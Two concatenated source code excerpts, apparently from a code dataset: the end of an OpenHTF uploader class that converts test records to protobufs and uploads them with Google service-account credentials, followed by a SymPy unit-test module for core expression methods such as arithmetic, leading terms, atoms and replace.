service_account_name=self.user,
private_key=self.keydata,
scope=self.SCOPE_CODE_URI,
user_agent='OpenHTF Guzzle Upload Client',
token_uri=self.token_uri)
self.credentials.set_store(_MemStorage())
else:
self.credentials = None
self.upload_result = None
self._cached_proto = None
@classmethod
def from_json(cls, json_data):
"""Create an uploader given (parsed) JSON data.
Note that this is a JSON-formatted key file downloaded from Google when
the service account key is created, *NOT* a json-encoded
oauth2client.client.SignedJwtAssertionCredentials object.
Args:
json_data: Dict containing the loaded JSON key data.
Returns:
a MfgInspectorCallback with credentials.
"""
return cls(user=json_data['client_email'],
keydata=json_data['private_key'],
token_uri=json_data['token_uri'])
def _convert(self, test_record_obj):
"""Convert and cache a test record to a mfg-inspector proto."""
if self._cached_proto is None:
self._cached_proto = self._converter(test_record_obj)
return self._cached_proto
def save_to_disk(self, filename_pattern=None):
"""Returns a callback to convert test record to proto and save to disk."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'save_to_disk.')
pattern = filename_pattern or self._default_filename_pattern
if not pattern:
raise RuntimeError(
'Must specify provide a filename_pattern or set a '
'_default_filename_pattern on subclass.')
def save_to_disk_callback(test_record_obj):
proto = self._convert(test_record_obj)
output_to_file = callbacks.OutputToFile(pattern)
with output_to_file.open_output_file(test_record_obj) as outfile:
outfile.write(proto.SerializeToString())
return save_to_disk_callback
def upload(self):
"""Returns a callback to convert a test record to a proto and upload."""
if not self._converter:
raise RuntimeError(
'Must set _converter on subclass or via set_converter before calling '
'upload.')
if not self.credentials:
raise RuntimeError('Must provide credentials to use upload callback.')
def upload_callback(test_record_obj):
proto = self._convert(test_record_obj)
self.upload_result = send_mfg_inspector_data(
proto, self.credentials, self.destination_url)
return upload_callback
def set_converter(self, converter):
"""Set converter callable to convert a OpenHTF tester_record to a proto.
Args:
converter: a callable that accepts an OpenHTF TestRecord and returns a
manufacturing-inspector compatible protobuf.
Returns:
self to make this call chainable.
"""
assert callable(converter), 'Converter must be callable.'
self._converter = converter
return self
# LEGACY / DEPRECATED
class UploadToMfgInspector(MfgInspector):
"""Generate a mfg-inspector TestRun proto and upload it.
LEGACY / DEPRECATED
This class is provided only for legacy reasons and may be deleted in future.
Please replace usage by configuring a MfgInspectorCallback directly. For
example:
test.add_output_callbacks(
mfg_inspector.MfgInspectorCallback.from_json(**json_data).set_converter(
test_runs_converter.test_run_from_test_record).upload()
)
"""
@staticmethod
def _converter(test_record_obj):
return test_runs_converter.test_run_from_test_record(test_record_obj)
def __call__(self, test_record_obj): # pylint: disable=invalid-name
upload_callback = self.upload()
upload_callback(test_record_obj) | unknown | codeparrot/codeparrot-clean | ||
from __future__ import division
from sympy import (Add, Basic, S, Symbol, Wild, Float, Integer, Rational, I,
sin, cos, tan, exp, log, nan, oo, sqrt, symbols, Integral, sympify,
WildFunction, Poly, Function, Derivative, Number, pi, NumberSymbol, zoo,
Piecewise, Mul, Pow, nsimplify, ratsimp, trigsimp, radsimp, powsimp,
simplify, together, collect, factorial, apart, combsimp, factor, refine,
cancel, Tuple, default_sort_key, DiracDelta, gamma, Dummy, Sum, E,
exp_polar, Lambda, expand, diff, O, Heaviside)
from sympy.core.function import AppliedUndef
from sympy.physics.secondquant import FockState
from sympy.physics.units import meter
from sympy.core.compatibility import xrange
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, n, t, u, x, y, z
class DummyNumber(object):
    """
    Minimal implementation of a number that works with SymPy.
    If one has a Number class (e.g. Sage Integer, or some other custom class)
    that one wants to work well with SymPy, one has to implement at least the
    methods of this class DummyNumber, resp. its subclasses I5 and F1_1.
    Basically, one just needs to implement either __int__() or __float__() and
    then one needs to make sure that the class works with Python integers and
    with itself.
    """
    # All operators return NotImplemented for unsupported operand types so
    # that Python can fall back to the other operand's (reflected) method.
    def __radd__(self, a):
        # int/float + DummyNumber
        if isinstance(a, (int, float)):
            return a + self.number
        return NotImplemented
    # True division delegates to the classic-division methods below.
    # NOTE: these two use ``a`` in place of the conventional ``self``.
    def __truediv__(a, b):
        return a.__div__(b)
    def __rtruediv__(a, b):
        return a.__rdiv__(b)
    def __add__(self, a):
        # DummyNumber + int/float/DummyNumber
        if isinstance(a, (int, float, DummyNumber)):
            return self.number + a
        return NotImplemented
    def __rsub__(self, a):
        if isinstance(a, (int, float)):
            return a - self.number
        return NotImplemented
    def __sub__(self, a):
        if isinstance(a, (int, float, DummyNumber)):
            return self.number - a
        return NotImplemented
    def __rmul__(self, a):
        if isinstance(a, (int, float)):
            return a * self.number
        return NotImplemented
    def __mul__(self, a):
        if isinstance(a, (int, float, DummyNumber)):
            return self.number * a
        return NotImplemented
    def __rdiv__(self, a):
        if isinstance(a, (int, float)):
            return a / self.number
        return NotImplemented
    def __div__(self, a):
        if isinstance(a, (int, float, DummyNumber)):
            return self.number / a
        return NotImplemented
    def __rpow__(self, a):
        if isinstance(a, (int, float)):
            return a ** self.number
        return NotImplemented
    def __pow__(self, a):
        if isinstance(a, (int, float, DummyNumber)):
            return self.number ** a
        return NotImplemented
    def __pos__(self):
        # Unary +: expose the wrapped value.
        return self.number
    def __neg__(self):
        # Unary -: negate the wrapped value.
        return - self.number
class I5(DummyNumber):
    # Integer-like dummy: implements only __int__ (wraps the value 5).
    number = 5
    def __int__(self):
        return self.number
class F1_1(DummyNumber):
    # Float-like dummy: implements only __float__ (wraps the value 1.1).
    number = 1.1
    def __float__(self):
        return self.number
# Shared fixture instances of the custom number classes above.
i5 = I5()
f1_1 = F1_1()
# basic sympy objects
basic_objs = [
    Rational(2),
    Float("1.3"),
    x,
    y,
    pow(x, y)*y,
]
# all supported objects: the SymPy objects above plus plain Python
# numbers and the DummyNumber instances
all_objs = basic_objs + [
    5,
    5.5,
    i5,
    f1_1
]
def dotest(s):
    """Invoke ``s`` on every ordered pair of objects from ``all_objs``.

    Used by the operator tests below to check that binary operations
    succeed for all combinations of SymPy objects, Python numbers and
    DummyNumber instances.  Returns True so callers can ``assert`` it.
    """
    for left in all_objs:
        for right in all_objs:
            s(left, right)
    return True
def test_basic():
    """Every unary/binary arithmetic operation must succeed for all pairs
    of supported objects (see ``all_objs``)."""
    def j(a, b):
        # Only the absence of exceptions is checked here, not the
        # resulting values; each expression exercises one operator.
        x = a
        x = +a
        x = -a
        x = a + b
        x = a - b
        x = a*b
        x = a/b
        x = a**b
    assert dotest(j)
def test_ibasic():
    """Augmented assignment (+=, -=, *=, /=) must succeed for all pairs
    of supported objects (see ``all_objs``)."""
    def s(a, b):
        # x is reset to ``a`` before each augmented assignment so every
        # operator is applied to the original operand.
        x = a
        x += b
        x = a
        x -= b
        x = a
        x *= b
        x = a
        x /= b
    assert dotest(s)
def test_relational():
    """Decidable comparisons must evaluate to the boolean singletons
    ``S.true``/``S.false``; undecidable ones stay unevaluated."""
    from sympy import Lt
    # pi is numerically > 3, so these all evaluate immediately.
    assert (pi < 3) is S.false
    assert (pi <= 3) is S.false
    assert (pi > 3) is S.true
    assert (pi >= 3) is S.true
    assert (-pi < 3) is S.true
    assert (-pi <= 3) is S.true
    assert (-pi > 3) is S.false
    assert (-pi >= 3) is S.false
    r = Symbol('r', real=True)
    # r - 2 < r - 3 reduces to -2 < -3, which is always false.
    assert (r - 2 < r - 3) is S.false
    # A comparison involving I must remain an unevaluated Lt instance.
    assert Lt(x + I, x + I + 2).func == Lt # issue 8288
def test_relational_assumptions():
    """Evaluation of sign comparisons with 0 must respect symbol
    assumptions."""
    from sympy import Lt, Gt, Le, Ge
    # A negated sign assumption alone (no real=True) is inconclusive, so
    # the relation stays unevaluated.
    m1 = Symbol("m1", nonnegative=False)
    m2 = Symbol("m2", positive=False)
    m3 = Symbol("m3", nonpositive=False)
    m4 = Symbol("m4", negative=False)
    assert (m1 < 0) == Lt(m1, 0)
    assert (m2 <= 0) == Le(m2, 0)
    assert (m3 > 0) == Gt(m3, 0)
    assert (m4 >= 0) == Ge(m4, 0)
    # Adding real=True makes the negated assumption decisive, e.g. real
    # and not nonnegative implies negative, so m1 < 0 is True.
    m1 = Symbol("m1", nonnegative=False, real=True)
    m2 = Symbol("m2", positive=False, real=True)
    m3 = Symbol("m3", nonpositive=False, real=True)
    m4 = Symbol("m4", negative=False, real=True)
    assert (m1 < 0) is S.true
    assert (m2 <= 0) is S.true
    assert (m3 > 0) is S.true
    assert (m4 >= 0) is S.true
    # Direct sign assumptions decide the relation immediately.
    m1 = Symbol("m1", negative=True)
    m2 = Symbol("m2", nonpositive=True)
    m3 = Symbol("m3", positive=True)
    m4 = Symbol("m4", nonnegative=True)
    assert (m1 < 0) is S.true
    assert (m2 <= 0) is S.true
    assert (m3 > 0) is S.true
    assert (m4 >= 0) is S.true
    # Real symbols with the same sign assumption negated give the
    # opposite truth value.
    m1 = Symbol("m1", negative=False, real=True)
    m2 = Symbol("m2", nonpositive=False, real=True)
    m3 = Symbol("m3", positive=False, real=True)
    m4 = Symbol("m4", nonnegative=False, real=True)
    assert (m1 < 0) is S.false
    assert (m2 <= 0) is S.false
    assert (m3 > 0) is S.false
    assert (m4 >= 0) is S.false
def test_relational_noncommutative():
    """Rich comparisons of noncommutative symbols must still build the
    corresponding Relational objects."""
    from sympy import Lt, Gt, Le, Ge
    lhs, rhs = symbols('A,B', commutative=False)
    # Each Python comparison operator should map to its Relational class.
    pairs = [
        (lhs < rhs, Lt(lhs, rhs)),
        (lhs <= rhs, Le(lhs, rhs)),
        (lhs > rhs, Gt(lhs, rhs)),
        (lhs >= rhs, Ge(lhs, rhs)),
    ]
    for built, expected in pairs:
        assert built == expected
def test_basic_nostr():
    """Arithmetic between basic SymPy objects and plain strings must
    raise TypeError, except the sequence-repetition case below."""
    for obj in basic_objs:
        raises(TypeError, lambda: obj + '1')
        raises(TypeError, lambda: obj - '1')
        if obj == 2:
            # The object equal to 2 multiplies a string via Python's
            # sequence repetition: 2 * '1' == '11'.
            assert obj * '1' == '11'
        else:
            raises(TypeError, lambda: obj * '1')
        raises(TypeError, lambda: obj / '1')
        raises(TypeError, lambda: obj ** '1')
def test_series_expansion_for_uniform_order():
    """series(x, 0, n) must keep exactly the terms of order below n and
    attach the matching O term, even when a 1/x pole is present."""
    assert (1/x + y + x).series(x, 0, 0) == 1/x + O(1, x)
    assert (1/x + y + x).series(x, 0, 1) == 1/x + y + O(x)
    assert (1/x + 1 + x).series(x, 0, 0) == 1/x + O(1, x)
    assert (1/x + 1 + x).series(x, 0, 1) == 1/x + 1 + O(x)
    assert (1/x + x).series(x, 0, 0) == 1/x + O(1, x)
    assert (1/x + y + y*x + x).series(x, 0, 0) == 1/x + O(1, x)
    assert (1/x + y + y*x + x).series(x, 0, 1) == 1/x + y + O(x)
def test_leadterm():
    """leadterm(x) must return the leading (coefficient, exponent) pair
    of an expression as x -> 0."""
    # A non-integer symbolic exponent is still dominated by the constant.
    assert (3 + 2*x**(log(3)/log(2) - 1)).leadterm(x) == (3, 0)
    # Only the leading exponent is checked for these Laurent/polynomial
    # expressions in x.
    cases = [
        (1/x**2 + 1 + x + x**2, -2),
        (1/x + 1 + x + x**2, -1),
        (x**2 + 1/x, -1),
        (1 + x**2, 0),
        (x + 1, 0),
        (x + x**2, 1),
        (x**2, 2),
    ]
    for expr, exponent in cases:
        assert expr.leadterm(x)[1] == exponent
def test_as_leading_term():
    """as_leading_term(x) must extract the dominant term as x -> 0."""
    cases = [
        # A non-integer symbolic exponent is dominated by the constant.
        (3 + 2*x**(log(3)/log(2) - 1), 3),
        (1/x**2 + 1 + x + x**2, 1/x**2),
        (1/x + 1 + x + x**2, 1/x),
        (x**2 + 1/x, 1/x),
        (1 + x**2, 1),
        (x + 1, 1),
        (x + x**2, x),
        (x**2, x**2),
        (x + oo, oo),
    ]
    for expr, leading in cases:
        assert expr.as_leading_term(x) == leading
def test_leadterm2():
    """leadterm works when the constant term is a nested function value."""
    assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).leadterm(x) == \
        (sin(1 + sin(1)), 0)
def test_leadterm3():
    """The x-free part of a linear sum is the leading coefficient at power 0."""
    coeff, exponent = (y + z + x).leadterm(x)
    assert coeff == y + z
    assert exponent == 0
def test_as_leading_term2():
    """as_leading_term keeps a nested-function constant term over an x term."""
    assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).as_leading_term(x) == \
        sin(1 + sin(1))
def test_as_leading_term3():
    """All coefficients at the lowest power of x are collected together."""
    constant_case = 2 + pi + x
    assert constant_case.as_leading_term(x) == 2 + pi
    linear_case = 2*x + pi*x + x**2
    assert linear_case.as_leading_term(x) == (2 + pi)*x
def test_as_leading_term4():
    # see issue 6843
    """Regression: leading term of a large rational combination cancels to n/2."""
    n = Symbol('n', integer=True, positive=True)
    r = -n**3/(2*n**2 + 4*n + 2) - n**2/(n**2 + 2*n + 1) + \
        n**2/(n + 1) - n/(2*n**2 + 4*n + 2) + n/(n*x + x) + 2*n/(n + 1) - \
        1 + 1/(n*x + x) + 1/(n + 1) - 1/x
    assert r.as_leading_term(x).cancel() == n/2
def test_as_leading_term_stub():
    """An undefined Function subclass: leading term is itself for constant-like
    arguments, but raises NotImplementedError for a plain symbolic argument."""
    class foo(Function):
        pass
    assert foo(1/x).as_leading_term(x) == foo(1/x)
    assert foo(1).as_leading_term(x) == foo(1)
    raises(NotImplementedError, lambda: foo(x).as_leading_term(x))
def test_atoms():
    """atoms() collects leaf nodes; atoms(*types) collects subexpressions of
    the given types, searching the whole tree."""
    assert x.atoms() == set([x])
    assert (1 + x).atoms() == set([x, S(1)])
    assert (1 + 2*cos(x)).atoms(Symbol) == set([x])
    assert (1 + 2*cos(x)).atoms(Symbol, Number) == set([S(1), S(2), x])
    assert (2*(x**(y**x))).atoms() == set([S(2), x, y])
    assert Rational(1, 2).atoms() == set([S.Half])
    assert Rational(1, 2).atoms(Symbol) == set([])
    # A non-type argument is treated as "instances of its type".
    assert sin(oo).atoms(oo) == set([oo])
    assert Poly(0, x).atoms() == set([S.Zero])
    assert Poly(1, x).atoms() == set([S.One])
    assert Poly(x, x).atoms() == set([x])
    assert Poly(x, x, y).atoms() == set([x])
    assert Poly(x + y, x, y).atoms() == set([x, y])
    assert Poly(x + y, x, y, z).atoms() == set([x, y])
    assert Poly(x + y*t, x, y, z).atoms() == set([t, x, y])
    assert (I*pi).atoms(NumberSymbol) == set([pi])
    # Argument order does not matter.
    assert (I*pi).atoms(NumberSymbol, I) == \
        (I*pi).atoms(I, NumberSymbol) == set([pi, I])
    # Nested matches are all collected, not just the outermost.
    assert exp(exp(x)).atoms(exp) == set([exp(exp(x)), exp(x)])
    assert (1 + x*(2 + y) + exp(3 + z)).atoms(Add) == \
        set([1 + x*(2 + y) + exp(3 + z), 2 + y, 3 + z])
    # issue 6132
    f = Function('f')
    e = (f(x) + sin(x) + 2)
    assert e.atoms(AppliedUndef) == \
        set([f(x)])
    assert e.atoms(AppliedUndef, Function) == \
        set([f(x), sin(x)])
    assert e.atoms(Function) == \
        set([f(x), sin(x)])
    assert e.atoms(AppliedUndef, Number) == \
        set([f(x), S(2)])
    assert e.atoms(Function, Number) == \
        set([S(2), sin(x), f(x)])
def test_is_polynomial():
    """is_polynomial(*syms) is True iff the expression is polynomial in the
    given symbols (or in all free symbols when none are given)."""
    k = Symbol('k', nonnegative=True, integer=True)
    assert Rational(2).is_polynomial(x, y, z) is True
    assert (S.Pi).is_polynomial(x, y, z) is True
    assert x.is_polynomial(x) is True
    # x is constant with respect to y, hence polynomial in y.
    assert x.is_polynomial(y) is True
    assert (x**2).is_polynomial(x) is True
    assert (x**2).is_polynomial(y) is True
    assert (x**(-2)).is_polynomial(x) is False
    assert (x**(-2)).is_polynomial(y) is True
    assert (2**x).is_polynomial(x) is False
    assert (2**x).is_polynomial(y) is True
    # Symbolic exponents are never polynomial, even nonnegative-integer ones.
    assert (x**k).is_polynomial(x) is False
    assert (x**k).is_polynomial(k) is False
    assert (x**x).is_polynomial(x) is False
    assert (k**k).is_polynomial(k) is False
    assert (k**x).is_polynomial(k) is False
    assert (x**(-k)).is_polynomial(x) is False
    assert ((2*x)**k).is_polynomial(x) is False
    assert (x**2 + 3*x - 8).is_polynomial(x) is True
    assert (x**2 + 3*x - 8).is_polynomial(y) is True
    assert (x**2 + 3*x - 8).is_polynomial() is True
    assert sqrt(x).is_polynomial(x) is False
    assert (sqrt(x)**3).is_polynomial(x) is False
    assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(x) is True
    assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(y) is False
    assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial() is True
    assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial() is False
    assert (
        (x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial(x, y) is True
    assert (
        (x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial(x, y) is False
def test_is_rational_function():
    """is_rational_function(*syms) is True iff the expression is a ratio of
    polynomials in the given symbols (all free symbols when none given)."""
    assert Integer(1).is_rational_function() is True
    assert Integer(1).is_rational_function(x) is True
    assert Rational(17, 54).is_rational_function() is True
    assert Rational(17, 54).is_rational_function(x) is True
    assert (12/x).is_rational_function() is True
    assert (12/x).is_rational_function(x) is True
    assert (x/y).is_rational_function() is True
    assert (x/y).is_rational_function(x) is True
    assert (x/y).is_rational_function(x, y) is True
    assert (x**2 + 1/x/y).is_rational_function() is True
    assert (x**2 + 1/x/y).is_rational_function(x) is True
    assert (x**2 + 1/x/y).is_rational_function(x, y) is True
    assert (sin(y)/x).is_rational_function() is False
    assert (sin(y)/x).is_rational_function(y) is False
    # sin(y) is a constant with respect to x alone.
    assert (sin(y)/x).is_rational_function(x) is True
    assert (sin(y)/x).is_rational_function(x, y) is False
def test_is_algebraic_expr():
    """is_algebraic_expr allows rational powers, unlike is_polynomial, but
    still rejects transcendental functions of the given symbols."""
    assert sqrt(3).is_algebraic_expr(x) is True
    assert sqrt(3).is_algebraic_expr() is True
    eq = ((1 + x**2)/(1 - y**2))**(S(1)/3)
    assert eq.is_algebraic_expr(x) is True
    assert eq.is_algebraic_expr(y) is True
    assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(x) is True
    assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(y) is True
    assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr() is True
    assert (cos(y)/sqrt(x)).is_algebraic_expr() is False
    # cos(y) is a constant with respect to x alone.
    assert (cos(y)/sqrt(x)).is_algebraic_expr(x) is True
    assert (cos(y)/sqrt(x)).is_algebraic_expr(y) is False
    assert (cos(y)/sqrt(x)).is_algebraic_expr(x, y) is False
def test_SAGE1():
    #see https://github.com/sympy/sympy/issues/3346
    """An object exposing _sympy_() is converted before arithmetic; the class
    itself (not an instance) still raises TypeError."""
    class MyInt:
        def _sympy_(self):
            return Integer(5)
    m = MyInt()
    e = Rational(2)*m
    assert e == 10
    raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE2():
    """An object exposing __int__ sympifies and multiplies; the class itself
    raises TypeError."""
    class MyInt(object):
        def __int__(self):
            return 5
    assert sympify(MyInt()) == 5
    e = Rational(2)*MyInt()
    assert e == 10
    raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE3():
    """A foreign object's __rmul__ wins over Expr multiplication."""
    class MySymbol:
        def __rmul__(self, other):
            return ('mys', other, self)
    o = MySymbol()
    e = x*o
    assert e == ('mys', x, o)
def test_len():
    """len() of .args counts the top-level arguments of Mul and Add."""
    product = x*y
    assert len(product.args) == 2
    total = x + y + z
    assert len(total.args) == 3
def test_doit():
    """doit evaluates Integrals by default; integrals=False leaves them alone."""
    a = Integral(x**2, x)
    assert isinstance(a.doit(), Integral) is False
    assert isinstance(a.doit(integrals=True), Integral) is False
    assert isinstance(a.doit(integrals=False), Integral) is True
    # doit also descends through coefficients.
    assert (2*Integral(x, x)).doit() == x**2
def test_attribute_error():
    """Symbols do not grow method-style trig/exp accessors."""
    for method_name in ('cos', 'sin', 'exp'):
        # getattr raises before the call is ever made.
        raises(AttributeError, lambda: getattr(x, method_name)())
def test_args():
    """.args exposes top-level operands; Mul/Add order may vary, Pow is fixed."""
    assert (x*y).args in ((x, y), (y, x))
    assert (x + y).args in ((x, y), (y, x))
    assert (x*y + 1).args in ((x*y, 1), (1, x*y))
    assert sin(x*y).args == (x*y,)
    assert sin(x*y).args[0] == x*y
    # Pow args are always (base, exponent).
    assert (x**y).args == (x, y)
    assert (x**y).args[0] == x
    assert (x**y).args[1] == y
def test_noncommutative_expand_issue_3757():
    """expand must preserve factor order for noncommutative symbols."""
    A, B, C = symbols('A,B,C', commutative=False)
    assert A*B - B*A != 0
    assert (A*(A + B)*B).expand() == A**2*B + A*B**2
    assert (A*(A + B + C)*B).expand() == A**2*B + A*B**2 + A*C*B
def test_as_numer_denom():
    """as_numer_denom splits an expression into (numerator, denominator),
    clearing rational coefficients over a common denominator; infinities and
    noncommutative factors are handled specially."""
    a, b, c = symbols('a, b, c')
    assert nan.as_numer_denom() == (nan, 1)
    assert oo.as_numer_denom() == (oo, 1)
    assert (-oo).as_numer_denom() == (-oo, 1)
    assert zoo.as_numer_denom() == (zoo, 1)
    # zoo absorbs the sign.
    assert (-zoo).as_numer_denom() == (zoo, 1)
    assert x.as_numer_denom() == (x, 1)
    assert (1/x).as_numer_denom() == (1, x)
    assert (x/y).as_numer_denom() == (x, y)
    assert (x/2).as_numer_denom() == (x, 2)
    assert (x*y/z).as_numer_denom() == (x*y, z)
    assert (x/(y*z)).as_numer_denom() == (x, y*z)
    assert Rational(1, 2).as_numer_denom() == (1, 2)
    assert (1/y**2).as_numer_denom() == (1, y**2)
    assert (x/y**2).as_numer_denom() == (x, y**2)
    assert ((x**2 + 1)/y).as_numer_denom() == (x**2 + 1, y)
    assert (x*(y + 1)/y**7).as_numer_denom() == (x*(y + 1), y**7)
    assert (x**-2).as_numer_denom() == (1, x**2)
    # Rational coefficients are cleared over a common denominator.
    assert (a/x + b/2/x + c/3/x).as_numer_denom() == \
        (6*a + 3*b + 2*c, 6*x)
    assert (a/x + b/2/x + c/3/y).as_numer_denom() == \
        (2*c*x + y*(6*a + 3*b), 6*x*y)
    assert (a/x + b/2/x + c/.5/x).as_numer_denom() == \
        (2*a + b + 4.0*c, 2*x)
    # this should take no more than a few seconds
    assert int(log(Add(*[Dummy()/i/x for i in xrange(1, 705)]
                       ).as_numer_denom()[1]/x).n(4)) == 705
    for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
        assert (i + x/3).as_numer_denom() == \
            (x + i, 3)
    assert (S.Infinity + x/3 + y/4).as_numer_denom() == \
        (4*x + 3*y + S.Infinity, 12)
    assert (oo*x + zoo*y).as_numer_denom() == \
        (zoo*y + oo*x, 1)
    # Noncommutative factors keep their order and negative powers in place.
    A, B, C = symbols('A,B,C', commutative=False)
    assert (A*B*C**-1).as_numer_denom() == (A*B*C**-1, 1)
    assert (A*B*C**-1/x).as_numer_denom() == (A*B*C**-1, x)
    assert (C**-1*A*B).as_numer_denom() == (C**-1*A*B, 1)
    assert (C**-1*A*B/x).as_numer_denom() == (C**-1*A*B, x)
    assert ((A*B*C)**-1).as_numer_denom() == ((A*B*C)**-1, 1)
    assert ((A*B*C)**-1/x).as_numer_denom() == ((A*B*C)**-1, x)
def test_as_independent():
    """as_independent(*syms) splits into (independent, dependent) parts —
    additively by default for Add, multiplicatively for Mul."""
    assert (2*x*sin(x) + y + x).as_independent(x) == (y, x + 2*x*sin(x))
    assert (2*x*sin(x) + y + x).as_independent(y) == (x + 2*x*sin(x), y)
    assert (2*x*sin(x) + y + x).as_independent(x, y) == (0, y + x + 2*x*sin(x))
    assert (x*sin(x)*cos(y)).as_independent(x) == (cos(y), x*sin(x))
    assert (x*sin(x)*cos(y)).as_independent(y) == (x*sin(x), cos(y))
    assert (x*sin(x)*cos(y)).as_independent(x, y) == (1, x*sin(x)*cos(y))
    assert (sin(x)).as_independent(x) == (1, sin(x))
    assert (sin(x)).as_independent(y) == (sin(x), 1)
    assert (2*sin(x)).as_independent(x) == (2, sin(x))
    assert (2*sin(x)).as_independent(y) == (2*sin(x), 1)
    # issue 4903 = 1766b
    # Noncommutative factors: only a left prefix can be split off.
    n1, n2, n3 = symbols('n1 n2 n3', commutative=False)
    assert (n1 + n1*n2).as_independent(n2) == (n1, n1*n2)
    assert (n2*n1 + n1*n2).as_independent(n2) == (0, n1*n2 + n2*n1)
    assert (n1*n2*n1).as_independent(n2) == (n1, n2*n1)
    assert (n1*n2*n1).as_independent(n1) == (1, n1*n2*n1)
    # as_Add selects additive vs multiplicative splitting explicitly.
    assert (3*x).as_independent(x, as_Add=True) == (0, 3*x)
    assert (3*x).as_independent(x, as_Add=False) == (3, x)
    assert (3 + x).as_independent(x, as_Add=True) == (3, x)
    assert (3 + x).as_independent(x, as_Add=False) == (1, 3 + x)
    # issue 5479
    assert (3*x).as_independent(Symbol) == (3, x)
    # issue 5648
    assert (n1*x*y).as_independent(x) == (n1*y, x)
    assert ((x + n1)*(x - y)).as_independent(x) == (1, (x + n1)*(x - y))
    assert ((x + n1)*(x - y)).as_independent(y) == (x + n1, x - y)
    assert (DiracDelta(x - n1)*DiracDelta(x - y)).as_independent(x) \
        == (1, DiracDelta(x - n1)*DiracDelta(x - y))
    assert (x*y*n1*n2*n3).as_independent(n2) == (x*y*n1, n2*n3)
    assert (x*y*n1*n2*n3).as_independent(n1) == (x*y, n1*n2*n3)
    assert (x*y*n1*n2*n3).as_independent(n3) == (x*y*n1*n2, n3)
    assert (DiracDelta(x - n1)*DiracDelta(y - n1)*DiracDelta(x - n2)).as_independent(y) == \
        (DiracDelta(x - n1)*DiracDelta(x - n2), DiracDelta(y - n1))
    # issue 5784
    # strict=True treats expressions with x as a dummy (the Integral) as free.
    assert (x + Integral(x, (x, 1, 2))).as_independent(x, strict=True) == \
        (Integral(x, (x, 1, 2)), x)
def test_replace():
    """replace supports type->type, pattern->expr, pattern->callable and
    predicate->callable rules, with exact/map/simultaneous options."""
    f = log(sin(x)) + tan(sin(x**2))
    assert f.replace(sin, cos) == log(cos(x)) + tan(cos(x**2))
    assert f.replace(
        sin, lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
    a = Wild('a')
    b = Wild('b')
    assert f.replace(sin(a), cos(a)) == log(cos(x)) + tan(cos(x**2))
    assert f.replace(
        sin(a), lambda a: sin(2*a)) == log(sin(2*x)) + tan(sin(2*x**2))
    # test exact
    # exact=True refuses matches where a wild would bind a zero coefficient.
    assert (2*x).replace(a*x + b, b - a, exact=True) == 2*x
    assert (2*x).replace(a*x + b, b - a) == 2/x
    assert (2*x).replace(a*x + b, lambda a, b: b - a, exact=True) == 2*x
    assert (2*x).replace(a*x + b, lambda a, b: b - a) == 2/x
    g = 2*sin(x**3)
    assert g.replace(
        lambda expr: expr.is_Number, lambda expr: expr**2) == 4*sin(x**9)
    # map=True also returns the substitution dictionary.
    assert cos(x).replace(cos, sin, map=True) == (sin(x), {cos(x): sin(x)})
    assert sin(x).replace(cos, sin) == sin(x)
    cond, func = lambda x: x.is_Mul, lambda x: 2*x
    assert (x*y).replace(cond, func, map=True) == (2*x*y, {x*y: 2*x*y})
    assert (x*(1 + x*y)).replace(cond, func, map=True) == \
        (2*x*(2*x*y + 1), {x*(2*x*y + 1): 2*x*(2*x*y + 1), x*y: 2*x*y})
    assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y, map=True) == \
        (sin(x), {sin(x): sin(x)/y})
    # if not simultaneous then y*sin(x) -> y*sin(x)/y = sin(x) -> sin(x)/y
    assert (y*sin(x)).replace(sin, lambda expr: sin(expr)/y,
        simultaneous=False) == sin(x)/y
    assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e) == O(1, x)
    assert (x**2 + O(x**3)).replace(Pow, lambda b, e: b**e/e,
        simultaneous=False) == x**2/2 + O(x**3)
    assert (x*(x*y + 3)).replace(lambda x: x.is_Mul, lambda x: 2 + x) == \
        x*(x*y + 5) + 2
    e = (x*y + 1)*(2*x*y + 1) + 1
    assert e.replace(cond, func, map=True) == (
        2*((2*x*y + 1)*(4*x*y + 1)) + 1,
        {2*x*y: 4*x*y, x*y: 2*x*y, (2*x*y + 1)*(4*x*y + 1):
        2*((2*x*y + 1)*(4*x*y + 1))})
    assert x.replace(x, y) == y
    assert (x + 1).replace(1, 2) == x + 2
    # https://groups.google.com/forum/#!topic/sympy/8wCgeC95tz0
    n1, n2, n3 = symbols('n1:4', commutative=False)
    f = Function('f')
    assert (n1*f(n2)).replace(f, lambda x: x) == n1*n2
    assert (n3*f(n2)).replace(f, lambda x: x) == n3*n2
def test_find():
    """find accepts a predicate, a type, a Wild pattern or a function class;
    group=True returns a multiplicity dict instead of a set."""
    expr = (x + y + 2 + sin(3*x))
    assert expr.find(lambda u: u.is_Integer) == set([S(2), S(3)])
    assert expr.find(lambda u: u.is_Symbol) == set([x, y])
    assert expr.find(lambda u: u.is_Integer, group=True) == {S(2): 1, S(3): 1}
    assert expr.find(lambda u: u.is_Symbol, group=True) == {x: 2, y: 1}
    assert expr.find(Integer) == set([S(2), S(3)])
    assert expr.find(Symbol) == set([x, y])
    assert expr.find(Integer, group=True) == {S(2): 1, S(3): 1}
    assert expr.find(Symbol, group=True) == {x: 2, y: 1}
    a = Wild('a')
    expr = sin(sin(x)) + sin(x) + cos(x) + x
    assert expr.find(lambda u: type(u) is sin) == set([sin(x), sin(sin(x))])
    assert expr.find(
        lambda u: type(u) is sin, group=True) == {sin(x): 2, sin(sin(x)): 1}
    assert expr.find(sin(a)) == set([sin(x), sin(sin(x))])
    assert expr.find(sin(a), group=True) == {sin(x): 2, sin(sin(x)): 1}
